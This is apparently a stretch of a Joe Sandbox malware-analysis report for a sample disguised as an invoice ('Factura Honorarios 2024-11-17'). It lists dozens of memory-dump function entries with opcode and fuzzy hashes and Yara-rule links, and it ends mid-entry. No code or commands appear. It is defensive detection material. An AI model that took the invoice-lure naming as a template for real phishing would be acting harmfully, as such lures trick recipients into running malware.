                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cf35586b68b8a7720b24080b2575a9ea3f908bd600e0562a8a21ba8440ee51a5
                                                                                                                                  • Instruction ID: 1ff250c4a47a69260147e178d011715b68b096a3b0c2ec2ec1d9a575fac76bfa
                                                                                                                                  • Opcode Fuzzy Hash: cf35586b68b8a7720b24080b2575a9ea3f908bd600e0562a8a21ba8440ee51a5
                                                                                                                                  • Instruction Fuzzy Hash: BB31C475E016488BDB15CFBAD9506DDBBF2AF8A300F24C12AC418BB255DB355906CF54
                                                                                                                                  Function 392121A7 Relevance: .1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7114072f81cf149166a1f66b666b932d5ba8bac951b1f5f9e85960500714b3e5
                                                                                                                                  • Instruction ID: f1f570c7a8a0f823b3f927002465f5c8ea7373a55ea60a84a8e3e9eea17b0a6b
                                                                                                                                  • Opcode Fuzzy Hash: 7114072f81cf149166a1f66b666b932d5ba8bac951b1f5f9e85960500714b3e5
                                                                                                                                  • Instruction Fuzzy Hash: 0231C474E01608CFEB18CFAAD9546DEBBF2AF89300F64842AD418BB254DB345946CF55
                                                                                                                                  Function 392070AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cab2d4ba2e7090ecdffd925193cab1f6fcf9afb7c068e666312176c880c12230
                                                                                                                                  • Instruction ID: a6750668c7c08d6d3488971430f4e87b2e4974c73aab771a96afe5e58be806ee
                                                                                                                                  • Opcode Fuzzy Hash: cab2d4ba2e7090ecdffd925193cab1f6fcf9afb7c068e666312176c880c12230
                                                                                                                                  • Instruction Fuzzy Hash: C831D274E006588BEB18CFAAD8506DEBBF2AF89300F54D12AC418BB354DB355946CF54
                                                                                                                                  Function 3921FB22 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bc5797ed6847c35ed11f4063eec97e0091ccaeed27c7d91abe701f20955b4e9d
                                                                                                                                  • Instruction ID: 0b1adaba2ef72f84823168e05312b1b18ecf52c078374383a9d66b3fd5dbf69c
                                                                                                                                  • Opcode Fuzzy Hash: bc5797ed6847c35ed11f4063eec97e0091ccaeed27c7d91abe701f20955b4e9d
                                                                                                                                  • Instruction Fuzzy Hash: 3331B275E01608CBEB18CFAAD8506DEBBF2AF89300F50D52AC418BB255EB345946CF55
                                                                                                                                  Function 39218461 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7aa599740adb4c11a6f5f90b4bc06d1d0391c3cf8c0442ada6e760df90bea437
                                                                                                                                  • Instruction ID: 78b4397c094faf5925daa447b361283344a8964a76edcad7a8be1762f958cd4d
                                                                                                                                  • Opcode Fuzzy Hash: 7aa599740adb4c11a6f5f90b4bc06d1d0391c3cf8c0442ada6e760df90bea437
                                                                                                                                  • Instruction Fuzzy Hash: C331B474E01648CBEB14CFAAD9546DDBBF2BF89300F54D12AD418BB254EB385906CF54
                                                                                                                                  Function 38F8FC5A Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 811c23729250e2b1fc96a82610f6749a6348dc85fb22b60b9520b7b8bb6fac9c
                                                                                                                                  • Instruction ID: 888ebbefe4182c5ae0be4c3156a49e366fea39dc7d2c239ccd85ae26923cc073
                                                                                                                                  • Opcode Fuzzy Hash: 811c23729250e2b1fc96a82610f6749a6348dc85fb22b60b9520b7b8bb6fac9c
                                                                                                                                  • Instruction Fuzzy Hash: 2331B175E01248CFEB18CFAAD8506DEBBF2AF8A300F50D52AD818BB254DB745946CF54
                                                                                                                                  Function 00158370 Relevance: .1, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a4ff52f5281f66250c87674c551463fbd12833b8118e39ceea7490553965a7bd
                                                                                                                                  • Instruction ID: a25f90608266fdf4ab54db01090504818a226a2060490e81e7d65185245fdcf3
                                                                                                                                  • Opcode Fuzzy Hash: a4ff52f5281f66250c87674c551463fbd12833b8118e39ceea7490553965a7bd
                                                                                                                                  • Instruction Fuzzy Hash: 9F21FE30304203CBCB155B798864B7E36A6AFC571A7154039DC26EF6A5EF25CC8BE392
                                                                                                                                  Function 392181DA Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1e1912ae9078da9eeba4656769eb6d360e14a3a3eed896e3e29e805180260d40
                                                                                                                                  • Instruction ID: cb3457233382b6814e102ebea702d4d267ddeb36989c7cc0302be06366f4a8e2
                                                                                                                                  • Opcode Fuzzy Hash: 1e1912ae9078da9eeba4656769eb6d360e14a3a3eed896e3e29e805180260d40
                                                                                                                                  • Instruction Fuzzy Hash: 9231D474E01648CBEB14CFAAD5906DEFBF2AF89300F64D52AC418BB254EB395902CF54
                                                                                                                                  Function 38F848D0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 04a09812c3e3ecc160655734e585353bf83258605402ea15f17e6b4b09317186
                                                                                                                                  • Instruction ID: b1030039a15a04467a5faff7399d1d8c838698eb38fbb7206da523d7df1a5045
                                                                                                                                  • Opcode Fuzzy Hash: 04a09812c3e3ecc160655734e585353bf83258605402ea15f17e6b4b09317186
                                                                                                                                  • Instruction Fuzzy Hash: 5E310430A08384DFDB059B74D81565D7FB6FFC6310F2480AED5459B6A2CB314E45CB61
                                                                                                                                  Function 001541A0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 31ec595fcc6febde6ce2cd09b372c25ecda8b983daa7d23f2fe4cdf85cca620b
                                                                                                                                  • Instruction ID: bc1db0fa0236f6b2fa96515491912e6730d0a907f47cdc6995fd3d91c3fa7955
                                                                                                                                  • Opcode Fuzzy Hash: 31ec595fcc6febde6ce2cd09b372c25ecda8b983daa7d23f2fe4cdf85cca620b
                                                                                                                                  • Instruction Fuzzy Hash: D4418375E01208CFDB48DFAAD89499DBBF2BF89301F248129E815BB325DB349846CF54
                                                                                                                                  Function 00158380 Relevance: .1, Instructions: 87COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5ae537c960058b07b50be84e79bd1ed0ab84050771f3649c524573bd7b16269e
                                                                                                                                  • Instruction ID: 18b1c81a55312f71ca311843083a2713e3fab26ef6a60be3bed6fcd52e1ea2d8
                                                                                                                                  • Opcode Fuzzy Hash: 5ae537c960058b07b50be84e79bd1ed0ab84050771f3649c524573bd7b16269e
                                                                                                                                  • Instruction Fuzzy Hash: 86217130304213CBDB145A658854B7F7696AFC475AF248039DC16EF7A4EF76CC86A391
                                                                                                                                  Function 001528F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 38a6bec8c95714c2a632dcb7003573d9516b5c5499ed58dc2d1cbb9e7fea66b0
                                                                                                                                  • Instruction ID: d233c10987048402517691c801b95e93b741434ad5be499962c2145fbccd41af
                                                                                                                                  • Opcode Fuzzy Hash: 38a6bec8c95714c2a632dcb7003573d9516b5c5499ed58dc2d1cbb9e7fea66b0
                                                                                                                                  • Instruction Fuzzy Hash: 1E216D76A00115DFCF14DB24C8409AE77A9EB9E364F20C11DD91A9B390DB36EE4ACBD1
                                                                                                                                  Function 00156300 Relevance: .1, Instructions: 74COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a780753ac663f29991d6a487b9648f5560ae04f60fa6cfda442db442158d157d
                                                                                                                                  • Instruction ID: e999c55e63140573e7b7176dfaa55f08263c8b6d87a18125b9299a1524efcbb3
                                                                                                                                  • Opcode Fuzzy Hash: a780753ac663f29991d6a487b9648f5560ae04f60fa6cfda442db442158d157d
                                                                                                                                  • Instruction Fuzzy Hash: 9021DE35300611CBC7199B29C898A2EB7A2FF897527558129E92ADB7A4CF31DC068BD0
                                                                                                                                  Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2656820381.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_ad000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 12aae3944cb78008acac82ea3cf948efadb2c9b653cc5b26c2818203813fe643
                                                                                                                                  • Instruction ID: 94ec79aec18f3e120e67a1e9040b7fa23c32662e6bb1c831638cf9986aee5142
                                                                                                                                  • Opcode Fuzzy Hash: 12aae3944cb78008acac82ea3cf948efadb2c9b653cc5b26c2818203813fe643
                                                                                                                                  • Instruction Fuzzy Hash: E4212575604304AFDB10CF60D9C4F16BBA1FB85314F20C66EE94A4B642C73AD846CA62
                                                                                                                                  Function 00155649 Relevance: .1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dff3f798016073313d61b2a497d230ed62373697255587c708e60c3c4eb1a3bf
                                                                                                                                  • Instruction ID: 99a1847e947ada38ec0aa1c609ed99425b8c12bce9e1a1d39f81e7068bc5c86d
                                                                                                                                  • Opcode Fuzzy Hash: dff3f798016073313d61b2a497d230ed62373697255587c708e60c3c4eb1a3bf
                                                                                                                                  • Instruction Fuzzy Hash: EC212631209288CFCB019F28D964BAE3BB2EF49311F604069FD199F256CB349D55DBA1
                                                                                                                                  Function 00159761 Relevance: .1, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 94681ed009c81764e4720704e092dd022aca854348a217cb1a9bc2a8e531499b
                                                                                                                                  • Instruction ID: 90dafd76d7d42d36f16c20ca0ca3f956e263176c3d42b8d3849506514a82a590
                                                                                                                                  • Opcode Fuzzy Hash: 94681ed009c81764e4720704e092dd022aca854348a217cb1a9bc2a8e531499b
                                                                                                                                  • Instruction Fuzzy Hash: E5215C70E01249DFDB05CFA1D550AEDBFB6AF49305F248059E925BA2A0DB30DD85DF60
                                                                                                                                  Function 38F8992C Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d074bb4efb04ae0e1aeb5e5000bf35437c3f5f14ec3973c00c307f1f000a3584
                                                                                                                                  • Instruction ID: f6bd31bc1fbde45a82272a029f4cfad6130fd6acf5bff2b3d27ed91ce9d1ae3c
                                                                                                                                  • Opcode Fuzzy Hash: d074bb4efb04ae0e1aeb5e5000bf35437c3f5f14ec3973c00c307f1f000a3584
                                                                                                                                  • Instruction Fuzzy Hash: 961126B4F00209CFEB14DFE9D884AADB7B5FB88304F148565E858E7245DB71E942CB60
                                                                                                                                  Function 001562F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: daa778c6c6724be335e9d3ae0008a20c0f6b08a1c1c105832e296a3309cdfda8
                                                                                                                                  • Instruction ID: aad07c1824c6959b861ab0bf94b95dd0c35e7327149ba2ca18a49b6b8b536739
                                                                                                                                  • Opcode Fuzzy Hash: daa778c6c6724be335e9d3ae0008a20c0f6b08a1c1c105832e296a3309cdfda8
                                                                                                                                  • Instruction Fuzzy Hash: B911E035705611CFC7199B29C8A892EBBB2BFC97523594079E81ACF7A1CF20CC468BD0
                                                                                                                                  Function 38F8463C Relevance: .1, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 105424f55cca02910963f96a4f142668cc06946c00ffcf41000f9be27a0eb3ff
                                                                                                                                  • Instruction ID: 386762412dbab519511a488e29996d839fe10d845627fccf212b6bf0395f1416
                                                                                                                                  • Opcode Fuzzy Hash: 105424f55cca02910963f96a4f142668cc06946c00ffcf41000f9be27a0eb3ff
                                                                                                                                  • Instruction Fuzzy Hash: 11118CBA300600CFD704DB69D998A56BBE2FFD8761F108869E10ACB761DB71DD00CB10
                                                                                                                                  Function 0015F640 Relevance: .1, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ec4ab5a5675cca34f3b4aecaece576504cb20ea522edef1c2f90dd35d42276d
                                                                                                                                  • Instruction ID: 13a80d36071df8a82036f13921d12ca5df8b289fd7d3e23f3b25b9a3b0ac15da
                                                                                                                                  • Opcode Fuzzy Hash: 0ec4ab5a5675cca34f3b4aecaece576504cb20ea522edef1c2f90dd35d42276d
                                                                                                                                  • Instruction Fuzzy Hash: 4E218EB0D04309DFEB05DFA8D85078EBFF2FB85300F0081A9C558AB265EB705A069F81
                                                                                                                                  Function 38F84C00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a00295b4a514fc98e824e8603f89f8662159676fbaa61e89d19ccc39da0129b
                                                                                                                                  • Instruction ID: ecddf53712d31270a17c10bb3f7cc956bfe1ca3f0a4f3ee5910c5c596b94f33d
                                                                                                                                  • Opcode Fuzzy Hash: 6a00295b4a514fc98e824e8603f89f8662159676fbaa61e89d19ccc39da0129b
                                                                                                                                  • Instruction Fuzzy Hash: 68117076E00719CFDB10EFB884406AEBBFAAB99250B404939D418E7300EB319D428BE1
                                                                                                                                  Function 001527F0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d53ef1392104def1455d77a42bdc08e2fa066aba312dd4ee290ca66978c05d66
                                                                                                                                  • Instruction ID: 184b6795549a9c3aa99c712377bececae5a96890c3abd77406623cdcd98a5f13
                                                                                                                                  • Opcode Fuzzy Hash: d53ef1392104def1455d77a42bdc08e2fa066aba312dd4ee290ca66978c05d66
                                                                                                                                  • Instruction Fuzzy Hash: 2421B274D052498FCB01DFA9D8445EDBFF4AF4A300F10526AD849B7221EB355A89CBA1
                                                                                                                                  Function 3920EBE2 Relevance: .1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a6f4ee2f07b77742c75184fbf1f2571f65fbc451b2429ee293bc2c43aeb075f7
                                                                                                                                  • Instruction ID: e48b85e2fe762eabb4ab50a13899f15a49e959bb8ba75a671bb0d7dfe966b898
                                                                                                                                  • Opcode Fuzzy Hash: a6f4ee2f07b77742c75184fbf1f2571f65fbc451b2429ee293bc2c43aeb075f7
                                                                                                                                  • Instruction Fuzzy Hash: 2011A0B1A006168FC760DB78D41955D7BF1AF8835171441EAD88AD7711E632C8828F92
                                                                                                                                  Function 0015F650 Relevance: .1, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00c587ef8d07df459b85cf64ae6cd98bb005f327a1b6b0f744dfe32cf6eb3e39
                                                                                                                                  • Instruction ID: a393238eceaf9677b2b1945a916eb3a6b8a042ffe6e8644875b3fa99a158dd12
                                                                                                                                  • Opcode Fuzzy Hash: 00c587ef8d07df459b85cf64ae6cd98bb005f327a1b6b0f744dfe32cf6eb3e39
                                                                                                                                  • Instruction Fuzzy Hash: B8111C70D00209DFEB04EFA9D95079EBFF2FB85301F1085A9D618AB265EB705E069F81
                                                                                                                                  Function 38F849E0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc2a61fc031c51b57ca91784d5fc1dead08790e7ed2e656ef0f782655fce4553
                                                                                                                                  • Instruction ID: 132c4f53d33ed36fadd29a41eb539ebf284c61538d841db9e9d80d9940cbd9a2
                                                                                                                                  • Opcode Fuzzy Hash: dc2a61fc031c51b57ca91784d5fc1dead08790e7ed2e656ef0f782655fce4553
                                                                                                                                  • Instruction Fuzzy Hash: 830124356083849FDB071B74AC181997FBAAFC721170940DBE64ACB2A3DA258D42C7B2
                                                                                                                                  Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2656820381.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_ad000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                                                                                  • Instruction ID: 34003a847e1ab1b89679d5229cbb5d14e3edfc50bc1487877ca72a4ad954bbb9
                                                                                                                                  • Opcode Fuzzy Hash: 9739b480a0bb4769e2d86e11a7df88a0109680c19479200658544855149774ec
                                                                                                                                  • Instruction Fuzzy Hash: E711D075504244DFCB11CF50C5C4B15BBA2FB45314F24C6AED84A4B652C33AD84ACF52
                                                                                                                                  Function 00155E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                  • Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
                                                                                                                                  • Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                                                                  • Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90
                                                                                                                                  Function 38F83248 Relevance: .0, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 673071e25918c53d506437d4056fa4c36a3738f8e867e6c5e0304b5afb14c0c9
                                                                                                                                  • Instruction ID: f6869000c7f91007fa4e7a299b610d08ec756855d060c0fa383966290d37818e
                                                                                                                                  • Opcode Fuzzy Hash: 673071e25918c53d506437d4056fa4c36a3738f8e867e6c5e0304b5afb14c0c9
                                                                                                                                  • Instruction Fuzzy Hash: 7F018C76A00208EFDB519FB5CC446AE7BB5FF89310B00442AE919A7252DB304D11CBB1
                                                                                                                                  Function 38F83258 Relevance: .0, Instructions: 46COMMON
